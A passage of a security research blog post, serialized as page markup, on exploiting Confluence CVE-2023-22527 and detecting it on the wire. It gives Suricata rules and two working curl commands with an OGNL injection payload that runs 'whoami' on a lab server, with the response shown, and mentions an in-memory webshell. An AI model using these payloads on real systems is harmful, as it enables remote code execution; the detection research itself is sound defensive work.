10.9.49.88:41826",[1373,75917,19057],{"class":1387},[1373,75919,75920],{"class":1375,"line":4724},[1373,75921,9460],{"class":2206},[1373,75923,75924,75927,75929,75932,75934,75937,75939,75942,75944,75946,75948,75950,75952,75955,75957,75959,75961,75963,75965,75968,75970,75972],{"class":1375,"line":4756},[1373,75925,75926],{"class":4640},"uid",[1373,75928,5417],{"class":1397},[1373,75930,75931],{"class":1391},"2002",[1373,75933,1384],{"class":1383},[1373,75935,75936],{"class":2206},"confluence",[1373,75938,2230],{"class":1383},[1373,75940,75941],{"class":4640}," gid",[1373,75943,5417],{"class":1397},[1373,75945,75931],{"class":1391},[1373,75947,1384],{"class":1383},[1373,75949,75936],{"class":2206},[1373,75951,2230],{"class":1383},[1373,75953,75954],{"class":4640}," groups",[1373,75956,5417],{"class":1397},[1373,75958,75931],{"class":1391},[1373,75960,1384],{"class":1383},[1373,75962,75936],{"class":2206},[1373,75964,2230],{"class":1383},[1373,75966,75967],{"class":1391},",0",[1373,75969,1384],{"class":1383},[1373,75971,48771],{"class":2206},[1373,75973,11875],{"class":1383},[61,75975,75977],{"id":75976},"detection-on-the-wire","Detection on the Wire",[18,75979,75980],{},"Perhaps the best place to catch exploitation of CVE-2023-22527 is on the wire. VulnCheck’s Initial Access team likes to obfuscate payloads to make life more challenging for detection engineers. For example, the reverse shell payload is entirely URL encoded here:",[18,75982,75983],{},[68,75984],{":width":10862,"alt":75985,"src":75986},"Lightly obfuscated exploit bypasses detections","\u002Fblog\u002Fconfluence-dreams-of-shells\u002Fcve-2023-22527-wireshark.png",[18,75988,75989,75990,75992,75993,75996],{},"This isn’t that strong of an obfuscation, though. The two elements of exploitation are still there. There is an unobfuscated ",[886,75991,49410],{}," parameter (not pictured but also not encoded because it’s a parameter) and ",[886,75994,75995],{},"u0027"," in some representations (URL encoded here). As such, the following rules should catch all CVE-2023-22527 exploitation attempts:",[1354,75998,76001],{"className":75999,"code":76000,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (POST Body)\"; \\\n flow:established,to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n http.request_body; content:\"label=\"; \\\n pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n reference:cve,CVE-2023-22527; \\\n classtype:web-application-attack; \\\n sid:12700246; rev:2;)\n\nalert http any any -> any any ( \\\n msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (POST URI)\"; \\\n flow:established,to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n content:\"label=\"; distance: 0; \\\n pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n reference:cve,CVE-2023-22527; \\\n classtype:web-application-attack; \\\n sid:12700258; rev:1;)\n\nalert http any any -> any any ( \\\n msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (GET)\"; \\\n flow:established,to_server; \\\n http.method; content:\"GET\"; \\\n http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n content:\"label=\"; distance: 0; \\\n pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n reference:cve,CVE-2023-22527; \\\n classtype:web-application-attack; \\\n sid:12700259; rev:1;)\n",[886,76002,76000],{"__ignoreMap":219},[18,76004,76005],{},"Perhaps surprising is that we have three rules for this vulnerability. It turns out, though, that the exploit can be thrown using HTTP GET:",[1354,76007,76009],{"className":31740,"code":76008,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -kvs -G -o \u002Fdev\u002Fnull http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm \\\n> --data-urlencode 'label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027' \\\n> --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))'\n* Trying 10.9.49.76:8090...\n* TCP_NODELAY set\n* Connected to 10.9.49.76 (10.9.49.76) port 8090 (#0)\n> GET \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027&p1=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29 HTTP\u002F1.1\n> Host: 10.9.49.76:8090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200\n\u003C Cache-Control: no-store\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-XSS-Protection: 1; mode=block\n\u003C X-Content-Type-Options: nosniff\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Security-Policy: frame-ancestors 'self'\n\u003C X-Confluence-Request-Time: 1709669510258\n\u003C Set-Cookie: JSESSIONID=4CABC119C5C70CC2C745D4107663F45C; Path=\u002F; HttpOnly\n\u003C Cmd-Ret: nt authority\\network service \n\u003C X-Accel-Buffering: no\n\u003C Content-Type: text\u002Fhtml;charset=UTF-8\n\u003C Content-Language: en-US\n\u003C Transfer-Encoding: chunked\n\u003C Date: Tue, 05 Mar 2024 20:11:50 GMT\n\u003C\n{ [7656 bytes data]\n* Connection #0 to host 10.9.49.76 left intact\n",[886,76010,76011,76034,76050,76064,76071,76078,76091,76113,76120,76126,76138,76142,76149,76156,76163,76170,76187,76194,76201,76215,76222,76248,76260,76267,76284,76291,76298,76305,76309,76324],{"__ignoreMap":219},[1373,76012,76013,76015,76017,76020,76023,76025,76028,76031],{"class":1375,"line":1376},[1373,76014,55482],{"class":2206},[1373,76016,2222],{"class":1391},[1373,76018,76019],{"class":2209}," -kvs",[1373,76021,76022],{"class":2209}," -G",[1373,76024,39692],{"class":2209},[1373,76026,76027],{"class":1391}," \u002Fdev\u002Fnull",[1373,76029,76030],{"class":1391}," http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm",[1373,76032,76033],{"class":2326}," \\\n",[1373,76035,76036,76038,76041,76043,76046,76048],{"class":1375,"line":220},[1373,76037,69588],{"class":4640},[1373,76039,76040],{"class":2209},"--data-urlencode",[1373,76042,4713],{"class":1387},[1373,76044,76045],{"class":1391},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027",[1373,76047,1388],{"class":1387},[1373,76049,76033],{"class":2326},[1373,76051,76052,76054,76056,76058,76061],{"class":1375,"line":1266},[1373,76053,69588],{"class":4640},[1373,76055,76040],{"class":2209},[1373,76057,4713],{"class":1387},[1373,76059,76060],{"class":1391},"p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))",[1373,76062,76063],{"class":1387},"'\n",[1373,76065,76066,76068],{"class":1375,"line":1852},[1373,76067,35613],{"class":1397},[1373,76069,76070],{"class":4640}," Trying 10.9.49.76:8090...\n",[1373,76072,76073,76075],{"class":1375,"line":4692},[1373,76074,35613],{"class":1397},[1373,76076,76077],{"class":4640}," TCP_NODELAY set\n",[1373,76079,76080,76082,76085,76088],{"class":1375,"line":4724},[1373,76081,35613],{"class":1397},[1373,76083,76084],{"class":4640}," Connected to 10.9.49.76 (",[1373,76086,76087],{"class":2206},"10.9.49.76",[1373,76089,76090],{"class":4640},") port 8090 (#0)\n",[1373,76092,76093,76095,76098,76101,76103,76106,76108,76111],{"class":1375,"line":4756},[1373,76094,5384],{"class":1397},[1373,76096,76097],{"class":2206}," GET",[1373,76099,76100],{"class":1391}," \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027",[1373,76102,7218],{"class":1383},[1373,76104,76105],{"class":4640},"p1",[1373,76107,5417],{"class":1397},[1373,76109,76110],{"class":1391},"%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29",[1373,76112,35589],{"class":2206},[1373,76114,76115,76117],{"class":1375,"line":4768},[1373,76116,5384],{"class":1397},[1373,76118,76119],{"class":4640}," Host: 10.9.49.76:8090\n",[1373,76121,76122,76124],{"class":1375,"line":4792},[1373,76123,5384],{"class":1397},[1373,76125,35603],{"class":4640},[1373,76127,76128,76130,76132,76134,76136],{"class":1375,"line":4798},[1373,76129,5384],{"class":1397},[1373,76131,35610],{"class":4640},[1373,76133,35613],{"class":1397},[1373,76135,2180],{"class":4640},[1373,76137,35618],{"class":1397},[1373,76139,76140],{"class":1375,"line":4806},[1373,76141,6765],{"class":1397},[1373,76143,76144,76146],{"class":1375,"line":4817},[1373,76145,35613],{"class":1397},[1373,76147,76148],{"class":4640}," Mark bundle as not supporting multiuse\n",[1373,76150,76151,76153],{"class":1375,"line":4825},[1373,76152,11852],{"class":1397},[1373,76154,76155],{"class":4640}," HTTP\u002F1.1 200\n",[1373,76157,76158,76160],{"class":1375,"line":4835},[1373,76159,11852],{"class":1397},[1373,76161,76162],{"class":4640}," Cache-Control: no-store\n",[1373,76164,76165,76167],{"class":1375,"line":4843},[1373,76166,11852],{"class":1397},[1373,76168,76169],{"class":4640}," Expires: Thu, 01 Jan 1970 00:00:00 GMT\n",[1373,76171,76172,76174,76177,76179,76182,76184],{"class":1375,"line":4849},[1373,76173,11852],{"class":1397},[1373,76175,76176],{"class":4640}," X-XSS-Protection: 1",[1373,76178,39663],{"class":1383},[1373,76180,76181],{"class":4640}," mode",[1373,76183,5417],{"class":1397},[1373,76185,76186],{"class":1391},"block\n",[1373,76188,76189,76191],{"class":1375,"line":4877},[1373,76190,11852],{"class":1397},[1373,76192,76193],{"class":4640}," X-Content-Type-Options: nosniff\n",[1373,76195,76196,76198],{"class":1375,"line":4915},[1373,76197,11852],{"class":1397},[1373,76199,76200],{"class":4640}," X-Frame-Options: SAMEORIGIN\n",[1373,76202,76203,76205,76208,76210,76213],{"class":1375,"line":4931},[1373,76204,11852],{"class":1397},[1373,76206,76207],{"class":4640}," Content-Security-Policy: frame-ancestors ",[1373,76209,1388],{"class":1387},[1373,76211,76212],{"class":1391},"self",[1373,76214,76063],{"class":1387},[1373,76216,76217,76219],{"class":1375,"line":4947},[1373,76218,11852],{"class":1397},[1373,76220,76221],{"class":4640}," X-Confluence-Request-Time: 1709669510258\n",[1373,76223,76224,76226,76229,76231,76234,76236,76239,76241,76243,76245],{"class":1375,"line":4952},[1373,76225,11852],{"class":1397},[1373,76227,76228],{"class":4640}," Set-Cookie: JSESSIONID",[1373,76230,5417],{"class":1397},[1373,76232,76233],{"class":1391},"4CABC119C5C70CC2C745D4107663F45C",[1373,76235,39663],{"class":1383},[1373,76237,76238],{"class":4640}," Path",[1373,76240,5417],{"class":1397},[1373,76242,2180],{"class":1391},[1373,76244,39663],{"class":1383},[1373,76246,76247],{"class":2206}," HttpOnly\n",[1373,76249,76250,76252,76255,76257],{"class":1375,"line":6776},[1373,76251,11852],{"class":1397},[1373,76253,76254],{"class":4640}," Cmd-Ret: nt authority",[1373,76256,8943],{"class":2326},[1373,76258,76259],{"class":4640},"etwork service \n",[1373,76261,76262,76264],{"class":1375,"line":6781},[1373,76263,11852],{"class":1397},[1373,76265,76266],{"class":4640}," X-Accel-Buffering: no\n",[1373,76268,76269,76271,76274,76276,76279,76281],{"class":1375,"line":7524},[1373,76270,11852],{"class":1397},[1373,76272,76273],{"class":4640}," Content-Type: text\u002Fhtml",[1373,76275,39663],{"class":1383},[1373,76277,76278],{"class":4640},"charset",[1373,76280,5417],{"class":1397},[1373,76282,76283],{"class":1391},"UTF-8\n",[1373,76285,76286,76288],{"class":1375,"line":7530},[1373,76287,11852],{"class":1397},[1373,76289,76290],{"class":4640}," Content-Language: en-US\n",[1373,76292,76293,76295],{"class":1375,"line":7546},[1373,76294,11852],{"class":1397},[1373,76296,76297],{"class":4640}," Transfer-Encoding: chunked\n",[1373,76299,76300,76302],{"class":1375,"line":7571},[1373,76301,11852],{"class":1397},[1373,76303,76304],{"class":4640}," Date: Tue, 05 Mar 2024 20:11:50 GMT\n",[1373,76306,76307],{"class":1375,"line":7598},[1373,76308,35662],{"class":1397},[1373,76310,76311,76313,76316,76319,76322],{"class":1375,"line":7615},[1373,76312,9149],{"class":1383},[1373,76314,76315],{"class":1383}," [",[1373,76317,76318],{"class":5467},"7656",[1373,76320,76321],{"class":4640}," bytes data",[1373,76323,7103],{"class":1383},[1373,76325,76326,76328,76331],{"class":1375,"line":7635},[1373,76327,35613],{"class":1397},[1373,76329,76330],{"class":4640}," Connection ",[1373,76332,76333],{"class":4630},"#0 to host 10.9.49.76 left intact\n",[18,76335,76336],{},"And it can be thrown with the parameters in the POST URI:",[1354,76338,76340],{"className":31740,"code":76339,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -kvs -X POST -G -o \u002Fdev\u002Fnull http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm \\\n> --data-urlencode 'label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027' \\\n> --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))'\n* Trying 10.9.49.76:8090...\n* TCP_NODELAY set\n* Connected to 10.9.49.76 (10.9.49.76) port 8090 (#0)\n> POST \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027&p1=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29 HTTP\u002F1.1\n> Host: 10.9.49.76:8090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200\n\u003C Cache-Control: no-store\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-XSS-Protection: 1; mode=block\n\u003C X-Content-Type-Options: nosniff\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Security-Policy: frame-ancestors 'self'\n\u003C X-Confluence-Request-Time: 1709669588783\n\u003C Set-Cookie: JSESSIONID=B96DB876DCA328DEDC0073326B666805; Path=\u002F; HttpOnly\n\u003C Cmd-Ret: nt authority\\network service \n\u003C X-Accel-Buffering: no\n\u003C Content-Type: text\u002Fhtml;charset=UTF-8\n\u003C Content-Language: en-US\n\u003C Transfer-Encoding: chunked\n\u003C Date: Tue, 05 Mar 2024 20:13:09 GMT\n\u003C\n{ [7656 bytes data]\n* Connection #0 to host 10.9.49.76 left intact\n",[886,76341,76342,76366,76380,76392,76398,76404,76414,76432,76438,76444,76456,76460,76466,76472,76478,76484,76498,76504,76510,76522,76529,76552,76562,76568,76582,76588,76594,76601,76605,76617],{"__ignoreMap":219},[1373,76343,76344,76346,76348,76350,76353,76356,76358,76360,76362,76364],{"class":1375,"line":1376},[1373,76345,55482],{"class":2206},[1373,76347,2222],{"class":1391},[1373,76349,76019],{"class":2209},[1373,76351,76352],{"class":2209}," -X",[1373,76354,76355],{"class":1391}," POST",[1373,76357,76022],{"class":2209},[1373,76359,39692],{"class":2209},[1373,76361,76027],{"class":1391},[1373,76363,76030],{"class":1391},[1373,76365,76033],{"class":2326},[1373,76367,76368,76370,76372,76374,76376,76378],{"class":1375,"line":220},[1373,76369,69588],{"class":4640},[1373,76371,76040],{"class":2209},[1373,76373,4713],{"class":1387},[1373,76375,76045],{"class":1391},[1373,76377,1388],{"class":1387},[1373,76379,76033],{"class":2326},[1373,76381,76382,76384,76386,76388,76390],{"class":1375,"line":1266},[1373,76383,69588],{"class":4640},[1373,76385,76040],{"class":2209},[1373,76387,4713],{"class":1387},[1373,76389,76060],{"class":1391},[1373,76391,76063],{"class":1387},[1373,76393,76394,76396],{"class":1375,"line":1852},[1373,76395,35613],{"class":1397},[1373,76397,76070],{"class":4640},[1373,76399,76400,76402],{"class":1375,"line":4692},[1373,76401,35613],{"class":1397},[1373,76403,76077],{"class":4640},[1373,76405,76406,76408,76410,76412],{"class":1375,"line":4724},[1373,76407,35613],{"class":1397},[1373,76409,76084],{"class":4640},[1373,76411,76087],{"class":2206},[1373,76413,76090],{"class":4640},[1373,76415,76416,76418,76420,76422,76424,76426,76428,76430],{"class":1375,"line":4756},[1373,76417,5384],{"class":1397},[1373,76419,76355],{"class":2206},[1373,76421,76100],{"class":1391},[1373,76423,7218],{"class":1383},[1373,76425,76105],{"class":4640},[1373,76427,5417],{"class":1397},[1373,76429,76110],{"class":1391},[1373,76431,35589],{"class":2206},[1373,76433,76434,76436],{"class":1375,"line":4768},[1373,76435,5384],{"class":1397},[1373,76437,76119],{"class":4640},[1373,76439,76440,76442],{"class":1375,"line":4792},[1373,76441,5384],{"class":1397},[1373,76443,35603],{"class":4640},[1373,76445,76446,76448,76450,76452,76454],{"class":1375,"line":4798},[1373,76447,5384],{"class":1397},[1373,76449,35610],{"class":4640},[1373,76451,35613],{"class":1397},[1373,76453,2180],{"class":4640},[1373,76455,35618],{"class":1397},[1373,76457,76458],{"class":1375,"line":4806},[1373,76459,6765],{"class":1397},[1373,76461,76462,76464],{"class":1375,"line":4817},[1373,76463,35613],{"class":1397},[1373,76465,76148],{"class":4640},[1373,76467,76468,76470],{"class":1375,"line":4825},[1373,76469,11852],{"class":1397},[1373,76471,76155],{"class":4640},[1373,76473,76474,76476],{"class":1375,"line":4835},[1373,76475,11852],{"class":1397},[1373,76477,76162],{"class":4640},[1373,76479,76480,76482],{"class":1375,"line":4843},[1373,76481,11852],{"class":1397},[1373,76483,76169],{"class":4640},[1373,76485,76486,76488,76490,76492,76494,76496],{"class":1375,"line":4849},[1373,76487,11852],{"class":1397},[1373,76489,76176],{"class":4640},[1373,76491,39663],{"class":1383},[1373,76493,76181],{"class":4640},[1373,76495,5417],{"class":1397},[1373,76497,76186],{"class":1391},[1373,76499,76500,76502],{"class":1375,"line":4877},[1373,76501,11852],{"class":1397},[1373,76503,76193],{"class":4640},[1373,76505,76506,76508],{"class":1375,"line":4915},[1373,76507,11852],{"class":1397},[1373,76509,76200],{"class":4640},[1373,76511,76512,76514,76516,76518,76520],{"class":1375,"line":4931},[1373,76513,11852],{"class":1397},[1373,76515,76207],{"class":4640},[1373,76517,1388],{"class":1387},[1373,76519,76212],{"class":1391},[1373,76521,76063],{"class":1387},[1373,76523,76524,76526],{"class":1375,"line":4947},[1373,76525,11852],{"class":1397},[1373,76527,76528],{"class":4640}," X-Confluence-Request-Time: 1709669588783\n",[1373,76530,76531,76533,76535,76537,76540,76542,76544,76546,76548,76550],{"class":1375,"line":4952},[1373,76532,11852],{"class":1397},[1373,76534,76228],{"class":4640},[1373,76536,5417],{"class":1397},[1373,76538,76539],{"class":1391},"B96DB876DCA328DEDC0073326B666805",[1373,76541,39663],{"class":1383},[1373,76543,76238],{"class":4640},[1373,76545,5417],{"class":1397},[1373,76547,2180],{"class":1391},[1373,76549,39663],{"class":1383},[1373,76551,76247],{"class":2206},[1373,76553,76554,76556,76558,76560],{"class":1375,"line":6776},[1373,76555,11852],{"class":1397},[1373,76557,76254],{"class":4640},[1373,76559,8943],{"class":2326},[1373,76561,76259],{"class":4640},[1373,76563,76564,76566],{"class":1375,"line":6781},[1373,76565,11852],{"class":1397},[1373,76567,76266],{"class":4640},[1373,76569,76570,76572,76574,76576,76578,76580],{"class":1375,"line":7524},[1373,76571,11852],{"class":1397},[1373,76573,76273],{"class":4640},[1373,76575,39663],{"class":1383},[1373,76577,76278],{"class":4640},[1373,76579,5417],{"class":1397},[1373,76581,76283],{"class":1391},[1373,76583,76584,76586],{"class":1375,"line":7530},[1373,76585,11852],{"class":1397},[1373,76587,76290],{"class":4640},[1373,76589,76590,76592],{"class":1375,"line":7546},[1373,76591,11852],{"class":1397},[1373,76593,76297],{"class":4640},[1373,76595,76596,76598],{"class":1375,"line":7571},[1373,76597,11852],{"class":1397},[1373,76599,76600],{"class":4640}," Date: Tue, 05 Mar 2024 20:13:09 GMT\n",[1373,76602,76603],{"class":1375,"line":7598},[1373,76604,35662],{"class":1397},[1373,76606,76607,76609,76611,76613,76615],{"class":1375,"line":7615},[1373,76608,9149],{"class":1383},[1373,76610,76315],{"class":1383},[1373,76612,76318],{"class":5467},[1373,76614,76321],{"class":4640},[1373,76616,7103],{"class":1383},[1373,76618,76619,76621,76623],{"class":1375,"line":7635},[1373,76620,35613],{"class":1397},[1373,76622,76330],{"class":4640},[1373,76624,76333],{"class":4630},[18,76626,76627],{},"All of which has to be accounted for in the ruleset.",[61,76629,1903],{"id":1902},[18,76631,76632,76633,76635,76636,76638,76639,76644,76645,76650],{},"There's more than one way to reach Rome. While using ",[886,76634,74225],{}," appears to be the popular way of exploiting CVE-2023-22527, other more stealthy paths generate different indicators. Of particular interest is the in-memory webshell, which had a pre-existing variant ",[1131,76637,36132],{}," we published this blog, and that variant appears to have been deployed ",[47,76640,76643],{"href":76641,"rel":76642},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%22X-Cmd-Result%22+%22X-Confluence-Request-Time%22",[51],"in the wild",". Defenders and attackers alike should consider ",[47,76646,76649],{"href":76647,"rel":76648},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain",[51],"these variants"," (and how they apply to other OGNL attacks).",[61,76652,202],{"id":201},[18,76654,76655,76656,982,76659],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-22527. For more research like this, see our blogs, ",[47,76657,40447],{"href":53829,"rel":76658},[51],[47,76660,35931],{"href":53837,"rel":76661},[51],[18,76663,53846,76664,53850,76667,982,76670,1260],{},[47,76665,1233],{"href":2871,"rel":76666},[51],[47,76668,1245],{"href":45535,"rel":76669},[51],[47,76671,216],{"href":214,"rel":76672},[51],[2901,76674,76675],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}",{"title":219,"searchDepth":220,"depth":220,"links":76677},[76678,76679,76684,76685,76686],{"id":11647,"depth":220,"text":11648},{"id":74232,"depth":220,"text":74233,"children":76680},[76681,76682,76683],{"id":74303,"depth":1266,"text":74304},{"id":74739,"depth":1266,"text":74740},{"id":75694,"depth":1266,"text":75695},{"id":75976,"depth":220,"text":75977},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"Examining memory resident payloads landed with CVE-2023-22527.",{"slug":76689},"confluence-dreams-of-shells","\u002Fblog\u002Fconfluence-dreams-of-shells",{"title":22211,"description":76687},"blog\u002Fconfluence-dreams-of-shells","aT5YgvpG5ZfRmQxxkCWpxHseoOg3cKPtAD8UW0gAX7c",{"id":76695,"title":76696,"articles":76697,"authors":76698,"body":76700,"date":78339,"description":78340,"extension":234,"image":7,"link":7,"meta":78341,"navigation":237,"path":78343,"seo":78344,"series":7,"stem":78345,"subtype":7,"tags":78346,"__hash__":78347},"blog\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve.md","Exploring the 